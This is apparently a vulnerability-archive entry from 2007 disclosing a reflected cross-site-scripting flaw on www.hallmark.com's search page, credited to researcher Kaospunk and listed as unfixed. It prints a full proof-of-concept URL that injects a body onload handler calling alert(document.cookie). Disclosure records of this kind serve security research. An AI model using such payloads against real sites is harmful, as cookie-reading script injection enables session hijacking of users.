Security researcher Kaospunk, has submitted on 01/11/2007 a cross-site-scripting (XSS) vulnerability affecting www.hallmark.com, which at the time of submission ranked 3689 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 01/11/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 01/11/2007 |
Date published: 01/11/2007 |
Fixed? Mail us! | Status: UNFIXED |
Author: Kaospunk |
Domain: www.hallmark.com |
Category: XSS |
Pagerank: 3689 |
URL: http://www.hallmark.com/webapp/wcs/stores/servlet/SearchResultsView?Ntt=ornament%22%3E%3Cbody%20onlo ad=alert(document.cookie)%3E&gnav_go.x=19&gnav_go.y=11&Nty=1&storeId=10001&catalogId=10051&N=35&Ntk= all_fields&Ntx=mode%2Bmatchallpartial&RPP=12&SBQ=yes |
Click here to view the mirror
|
|
|